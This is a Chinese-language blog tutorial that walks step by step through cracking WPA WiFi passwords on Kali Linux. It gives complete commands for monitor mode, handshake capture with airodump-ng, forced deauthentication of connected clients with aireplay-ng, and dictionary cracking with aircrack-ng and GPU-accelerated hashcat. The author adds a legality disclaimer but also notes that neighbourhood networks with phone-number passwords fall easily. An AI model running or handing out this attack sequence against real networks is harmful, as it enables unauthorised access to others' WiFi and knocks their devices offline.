各位小伙伴大家好鴨，鴿了好幾天，今天突然發現一個比較好用的東西，下面聽我慢慢道來WIFI握手包破解握手包簡單理解就是發送指令與驗證指令俗稱密碼驗證加密方式hash（哈希算法）kali破解wifi密碼開始1、選擇合適的網卡，有些網卡kali識

各位小伙伴大家好鴨，鴿了好幾天，今天突然發現一個比較好用的東西，下面聽我慢慢道來

WIFI握手包破解

握手包簡單理解就是發送指令與驗證指令俗稱密碼驗證 加密方式hash（哈希算法）

kali破解wifi密碼

開始

1、選擇合適的網卡，有些網卡kali識別不了，我用的網卡信息

2、網卡開啟監聽模式

3、查看監聽模式是否開啟成功（網卡名稱變成wlan0mon說明已經開啟成功）

4、輸入“airodump-ng wlan0mon”，掃描附近熱點信息，找到自己想要破解的熱點名稱后按下ctrl+c停止掃描（NEM-AL10是我自己用手機開啟的熱點，破解他人無線密碼是違法的，自己搭個熱點玩玩就行）

5、抓取握手包。命令格式“airodump-ng -c {CH} --bssid {BSSID} -w {要保存握手包的目錄}”輸入：airodump-ng -c 11 --bssid 3C:FA:43:7E:57:48 -w /home/ wlan0mon，當抓到握手包的時候箭頭處會顯示”handshake“字樣

6、可以看到現在抓不到握手包，是因為沒有客戶端與AP進行連接。但是我們看到了一個已連接的熱點，我們發送反認證包，讓其下線，然后改客戶端會重新嘗試連接熱點，然后我們就可以抓到握手包了。

新開一個終端窗口，命令格式為：aireplay-ng -0 {發送反認證包的個數} -a {BSSID} -c {強制下線的MAC地址（STATION下面的地址）} 無線網卡名稱

輸入“aireplay-ng -0 10 -a 3C:FA:43:7E:57:48 -c 30:10:B3:DC:9F:75 wlan0mon”，系統會下線，然后重新連接，然后我們就可以抓到握手包了。

7、按下ctrl+c停止抓包。進到/home目錄下查看握手包，其中"-01.cap"是我們一會兒破解要用到的數據包

8、使用aircrack-ng進行破解。命令格式：aircrack-ng -w {本地的字典文件（破解的關鍵）} {握手包}

輸入"aircrack-ng -w top3000.txt /home/-01.cap"，由于握手包命名的特殊性，這里只能使用絕對路徑，可以改個名字就可以使用相對路徑了

字典啥的需要自備哦。小區附近的wifi用電話號碼和弱密碼成功概率極高

aircrack-ng優缺點

較為簡單，上手即用，但詬病也比較大，在破解握手包時，CPU直接100%，啥事也干不成，對于雙系統的我，更是不敢使用，晚上睡覺前跑包，一晚上能跑完。

Hashcat

hashcat號稱世界上最快的密碼破解，世界上第一個和唯一的基于GPGPU規則引擎，免費多GPU（高達128個GPU），多哈希，多操作系統（Linux和Windows本地二進制文件），多平臺（OpenCL和CUDA支持），多算法，資源利用率低，基于字典攻擊，支持分布式破解等等。

其實關鍵就是可以調用GPU進行破解，速度一流，原來兩個小時40分鐘的包，GTX 920M 縮減成40分鐘。

但是在此之前，我們需要安裝一些東西，眾所周知，linux安裝GPU驅動，有點危險，弄不好就會翻車。

https://www.kali.org/docs/general-use/install-nvidia-drivers-on-kali-linux/

但是我們可以直接安裝 CUDA toolkit.

apt install -y ocl-icd-libopencl1 nvidia-driver nvidia-cuda-toolkit

一鍵安裝，絕不翻車。安裝好了過后，重啟一下。

nvidia-smi

hashcat -I

即可查看GPU信息

hashcat -b

進行算法測試，可以查看自己GPU的跑包的速度。

總體來說，跑的速度比CPU快的不知道多少倍，還可以拿linux玩玩其他的。

hashcat 跑包命令

hashcat -m 2500 *.hccapx 字典文件

注意：hccapx需要cap包轉化成hccapx包

轉化網址:https://hashcat.net/cap2hccapx/